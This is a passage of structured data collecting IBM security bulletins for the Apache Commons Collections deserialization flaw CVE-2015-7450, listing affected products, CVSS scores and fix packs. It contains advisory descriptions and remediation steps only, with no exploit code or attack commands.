Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nMaximo Asset Management 7.6 \nSmartCloud Control Desk 7.6 \nMaximo for Life Sciences 7.6 \nMaximo for Aviation 7.6| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 8.5 Full Profile \nMaximo Asset Management 7.5 \nMaximo Asset Management Essentials 7.5 \nMaximo for Government 7.5 \nMaximo for Nuclear Power 7.5 \nMaximo for Transportation 7.5 \nMaximo for Life Sciences 7.5 \nMaximo for Oil and Gas 7.5 \nMaximo for Utilities 7.5 \nMaximo Adapter for Primavera 7.5 \nIBM Control Desk 7.5 \nTRIRIGA Energy Optimization 1.1| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 8.5 Full Profile \nIBM WebSphere Application Server 8.0 \nIBM WebSphere Application Server 7.0 \nMaximo Asset Management 7.1 \nMaximo Asset Management Essentials 7.1 \nMaximo Asset Management for Energy Optimization 7.1 \nMaximo for Government 7.1 \nMaximo for Nuclear Power 7.1 \nMaximo for Transportation 7.1 \nMaximo for Life Sciences 7.1 \nMaximo for Oil and Gas 7.1 \nMaximo for Utilities 7.1 \nMaximo Adapter for Primavera 7.1| IBM WebSphere Application Server 7.0 \nTivoli Asset Management for IT 7.2 \nTivoli Service Request Manager 7.2 \nChange and Configuration Management Database 7.2| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 7.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-22T03:02:31", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with Asset and Service Management (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2022-09-22T03:02:31", "id": "CD6036E42997395942F7FF83895D94F94E8BFD2DC6168C160F484DA20BCCF217", "href": "https://www.ibm.com/support/pages/node/271703", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:50:25", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Standards Processing Engine.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Standards Processing Engine for Supply Chain EDI v.2.0.0.0/8.5.0.0 and v.2.0.1.1/8.5.1.1 \nIBM Standards Processing Engine for Healthcare Payer v.2.0.0.0/8.5.0.0 and v.2.0.1.1/8.5.1.1\n\n## Remediation/Fixes\n\nFix for all affected versions is to download and install the interim fix [8.5.1.1-OtherSoftware-SPE-All-if0001](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FStandards+Processing+Engine&fixids=8.5.1.1-OtherSoftware-SPE-All-if0001&source=SAR>) from [IBM Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FStandards+Processing+Engine&fixids=8.5.1.1-OtherSoftware-SPE-All-if0001&source=SAR>). \n \n\n\n_Product_| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nIBM Standards Processing Engine for Supply Chain EDI| 2.0.0.0 / 8.5.0.0| None| [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FStandards+Processing+Engine&fixids=8.5.1.1-OtherSoftware-SPE-All-if0001&source=SAR>) \n2.0.1.1 / 8.5.1.1| None| [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FStandards+Processing+Engine&fixids=8.5.1.1-OtherSoftware-SPE-All-if0001&source=SAR>) \nIBM Standards Processing Engine for Healthcare Payer| 2.0.0.0 / 8.5.0.0| None| [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FStandards+Processing+Engine&fixids=8.5.1.1-OtherSoftware-SPE-All-if0001&source=SAR>) \n2.0.1.1 / 8.5.1.1| None| [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FStandards+Processing+Engine&fixids=8.5.1.1-OtherSoftware-SPE-All-if0001&source=SAR>) \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nNo workarounds or mitigations are available. \n\n**Important note: **IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www.ibm.com/systems/z/solutions/security_subintegrity.html>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-15T12:11:44", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Standards Processing Engine (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2022-05-15T12:11:44", "id": "5AC842C76A38BA7E6961E8ACD0BA85FA50688DCA05B04D73F870154778C0B550", "href": "https://www.ibm.com/support/pages/node/273733", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:47:44", "description": "## Summary\n\nThe following vulnerability in Apache commons that affects the desktop IBM Process Designer has been addressed.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION: **Serialized-object interfaces in certain IBM analytics, business solutions, cognitive, IT infrastructure, and mobile and social products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the InvokerTransformer class in the Apache Commons Collections library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Products | Versions \n---|--- \nIBM Business Automation Workflow | 18.0.0.0 - 19.0.0.3 \nIBM Business Process Manager | 8.6.0.0 - 8.6.0.0 CF2018.03 \nIBM Business Process Manager | 8.5.0.0 - 8.5.7 2017.06 \nIBM Business Process Manager | 8.0.0.0 - 8.0.1.3 \n \n## Remediation/Fixes\n\nInstall interim fix JR61681 for your version:\n\n * [IBM Business Automation Workflow 19.0.0.3](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=fixId&fixids=8.6.10019003-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Automation Workflow 19.0.0.2](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=fixId&fixids=8.6.10019002-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Automation Workflow 19.0.0.1](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=fixId&fixids=8.6.10019001-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Automation Workflow 18.0.0.1](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=fixId&fixids=8.6.10018001-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager 8.6.0.0 CF2018.03](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=fixId&fixids=8.6.0.201803-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager Advanced 8.5.7 CF2017.06](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Advanced&release=All&platform=All&function=fixId&fixids=8.5.7.201706-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager Standard 8.5.7 CF2017.06](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Standard&release=All&platform=All&function=fixId&fixids=8.5.7.201706-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager Express 8.5.7 CF2017.06](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Express&release=All&platform=All&function=fixId&fixids=8.5.7.201706-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager Advanced 8.0.1.3](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Advanced&release=All&platform=All&function=fixId&fixids=8.0.1.3-WS-BPMPC-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager Standard 8.0.1.3](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Standard&release=All&platform=All&function=fixId&fixids=8.0.1.3-WS-BPMPC-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager Express 8.0.1.3](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Express&release=All&platform=All&function=fixId&fixids=8.0.1.3-WS-BPMPC-IFJR61681&includeSupersedes=0&source=fc>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T15:02:20", "type": "ibm", "title": "Security Bulletin: CVE-2015-7450 affects the desktop IBM Process Designer used in IBM Business Automation Workflow and IBM Business Process Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2022-09-14T15:02:20", "id": "7B3AC56328D3147E79BEC5737ADB41C519A985674FD8C6C608CC27164A464E84", "href": "https://www.ibm.com/support/pages/node/1143214", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:50:54", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM InfoSphere Master Data Management Server . Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM InfoSphere Master Data Management Server 9.0| IBM WebSphere Application Server 7.0 \nIBM InfoSphere Master Data Management Server 10.0| IBM WebSphere Application Server 7.0 \nIBM InfoSphere Master Data Management Server 10.1| IBM WebSphere Application Server 8.0 \nIBM InfoSphere Master Data Management Standard/Advanced Edition 11.0| IBM WebSphere Application Server 8.5 \nIBM InfoSphere Master Data Management Standard/Advanced Edition 11.3| IBM WebSphere Application Server 8.5.5 \nIBM InfoSphere Master Data Management Standard/Advanced Edition 11.4| IBM WebSphere Application Server 8.5.5 \nIBM InfoSphere Master Data Management Standard/Advanced Edition 11.5| IBM WebSphere Application Server 8.5.5 \n \n## Workarounds and Mitigations\n\nNone that are known.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:58:00", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM InfoSphere Master Data Management Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2022-04-27T09:58:00", "id": "D71ECE9054A0423D2796261CBA40257762AA9E2D7719136781F2B173EA9107E9", "href": "https://www.ibm.com/support/pages/node/272071", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:47:55", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by WebSphere Application Server and WebSphere Application Server Hypervisor Edition. This vulnerability does not affect the IBM HTTP Server or versions of WebSphere Application Server prior to Version 7.0. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nThe following Versions of WebSphere Application Server and IBM WebSphere Application Server Hypervisor Edition may be affected: \n\n * Version 8.5 and 8.5.5 Traditional and Liberty \n * Version 8.0 \n * Version 7.0\n * Prior Versions of WebSphere Application Server are not affected. \n\n## Remediation/Fixes\n\n**For IBM WebSphere Application Server ****Liberty ** \n**For Liberty V8.5.5.0 through 8.5.5.9 and 16.0.0.2 through 17.0.0.3 using the optional EJB Embeddable Container and JPA Client Feature: **\n\nIf you use Liberty and you have the following files on your system:\n\n\u00b7 com.ibm.ws.ejb.embeddableContainer_nls_8.5.0.jar\n\n\u00b7 com.ibm.ws.jpa.thinclient_8.5.0.jar\n\nthen you are using the vulnerable feature and you should upgrade these jars to the 17.0.0.4 version. \n\n**To upgrade the jars that were installed with archive install**: \n\n * Apply the [Liberty extras](<http://www-01.ibm.com/support/docview.wss?uid=swg24044285>) [](<www-01.ibm.com/support/docview.wss?uid=swg24044285>)jar, wlp-extras-17.0.0.4.jar from the Liberty Fix Pack 17.0.0.4 or later. \n \n\n\n**To upgrade the jars that were installed with the IBM installation manager:**\n\n * Delete the EJB Embeddable Container and JPA Client jars from the ${wlp.install.dir}/dev/tools/containers directory, and then use the wlp-extras-17.0.0.4.jar from the Liberty Fix Pack 17.0.0.4 or later to install the fixed version. More information can be found in the [_Knowledge Center_](<https://www.ibm.com/support/knowledgecenter/SSEQTP_liberty/com.ibm.websphere.wlp.nd.multiplatform.doc/ae/twlp_ins_modify.html>) . \n \n\\--OR \n\n * Apply Liberty Fix pack 17.0.0.4 or later. \n \n**To upgrade the jars from WASdev**: \n\n * download the fix from here: <https://developer.ibm.com/wasdev/downloads/#asset/tools-WAS_Liberty_Java_EE_Application_Test_Utilities>\n \n**Important notes:** The version of WebSphere Liberty that you use and the version of the developer extra jar files do not need to match Fixpack levels. The Application Server does not contain the vulnerability but it is present in the jars that are part of the developer extras. \n\n \n \n**For V8.5.0.0 through 8.5.5.7 WebSphere Liberty:** \n \nThe IBM WebSphere Application Server Liberty only enables the Apache Commons Collections if you are using ONE of the following three features: \n\n * jsf-2.0\n * jsf-2.2\n * jpa-2.0\n \nYou may be vulneraable if you are using any one of these features. To determine if you are vulnerable you can look in the console.log for this message: \n\n``\n\n[AUDIT ] CWWKF0012I: The server installed the following features: [xxxxx]\n\nIf in place of the xxxxx it does not contain any one of those three features listed then you are not vulnerable. \n\n\u00b7 If you are vulnerable then upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix [PI52103](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039898>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039403>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038969>)\n\n\\-- OR \n\n\u00b7 Apply Fix Pack 8 (8.5.5.8), or later.\n\n \n**For IBM WebSphere Application Server and IBM WebSphere Application Server Hypervisor Edition:** ** \n** \n**For V8.5.0.0 through 8.5.5.7:**\n\n * Apply Interim Fix [PI52103](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039898>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039403>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038969>)\n\\-- OR \n * Apply Fix Pack 8 (8.5.5.8), or later.\n \n**For V8.0.0.0 through 8.0.0.11:**\n\n * Apply Interim Fix [PI52103](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039898>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039403>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038969>)\n\\-- OR \n * Apply Fix Pack 12 (8.0.0.12), or later.\n** \nFor V7.0.0.0 through 7.0.0.39:**\n\n * Apply Interim Fix [PI52103](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039898>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039403>)\n\\-- OR \n * Apply Fix Pack 41 (7.0.0.41), or later. \n \n\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-08T00:26:26", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2022-09-08T00:26:26", "id": "EE24AB0B2E014F082958A51E75EF50D8A2A13DBA178F55CE89E4F1B70E8B8524", "href": "https://www.ibm.com/support/pages/node/271209", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:53:52", "description": "## Summary\n\nIBM TRIRIGA Platform is vulnerable to Java Object De-Serialization Vulnerability.\n\n## Vulnerability Details\n\n**CVEID: **_CVE-2015-7450_ \n \nCVSS Base Score: 9.80 \nCVSS Temporal Score: See [_X-Force_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe following IBM TRIRIGA Application Platform versions are affected. \n\u00b7 IBM TRIRIGA Application Platform 3.4. \n\u00b7 IBM TRIRIGA Application Platform 3.3.\n\n## Remediation/Fixes\n\nThis vulnerability is resolved in the IBM TRIRIGA Application Platform 3.4.2.2, and 3.3.2.5 fix packs.\n\n## Workarounds and Mitigations\n\nUntil you apply the fixes, it may be possible to reduce the risk of a successful attack by restricting access to internal networks, and not allowing external/Internet access to the application.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-08T20:39:52", "type": "ibm", "title": "Security Bulletin: Vulnerability in IBM TRIRIGA Application Platform (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2021-12-08T20:39:52", "id": "9E20D1855575208AB10D7A37A8F732F5FB0995B4D096646EBC735EE1706B18C6", "href": "https://www.ibm.com/support/pages/node/273787", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:45:47", "description": "## Summary\n\nIBM WebSphere Application Server is embedded in Tivoli Integrated Portal shipped as a component of Tivoli Network Manager IP Edition 3.8, 3.9, 4.1, 4.1.1 and 4.2. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the below security bulletins \n\n \n[_Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n[_Security Bulletin: HTTP response splitting attack in WebSphere Application Server (CVE-2015-2017)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21966837>) \n \nfor vulnerability details and information about fixes \n\n## Affected Products and Versions\n\n_Principal Product and Version(s)_| _Affected Supporting Product and Version_ \n---|--- \nIBM Tivoli Network Manager 3.8| Bundled the TIP version 1.1.1.x, which bundles IBM WebSphere version 6.1.0.x. \nIBM Tivoli Network Manager 3.9| Bundled the TIP version 2.1.0.x, which bundles IBM WebSphere version 7.0.0.x. \nIBM Tivoli Network Manager 4.1 and 4.1.1| Bundled the TIP version 2.2.0.x, which bundles IBM WebSphere version 7.0.0.x. \nIBM Tivoli Network Manager 4.2| IBM Tivoli Network Manager 4.2 requires to install IBM Websphere Application Server Version 8.5.5.5 or later version separately. Users are recommended to apply IBM WebSphere version 8.5.5.5 Security Interim Fixes.. \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:20:04", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server embedded in Tivoli Integrated Portal shipped with Tivoli Network Manager IP Edition (CVE-2015-7450) (CVE-2015-2017)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-7450"], "modified": "2018-06-17T15:20:04", "id": "9E3FCEB3C8DC76AD3152DBCC2EFEFAB5F229FFCEF4CF1D756D45190726CF3D0D", "href": "https://www.ibm.com/support/pages/node/545607", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:02", "description": "## Summary\n\nWebsphere Application Server is shipped as a component of Jazz for Service Management. Information about the security vulnerabilities affecting Websphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the below security bulletins \n \n[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n \n[Security Bulletin: HTTP response splitting attack in WebSphere Application Server (CVE-2015-2017)](<http://www-01.ibm.com/support/docview.wss?uid=swg21966837>) \n \nfor vulnerability details and information about fixes\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nJazz for Service Management version 1.1, 1.1.1, 1.1.2| Websphere Application Server 8.5.5 Full Profile \n \n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 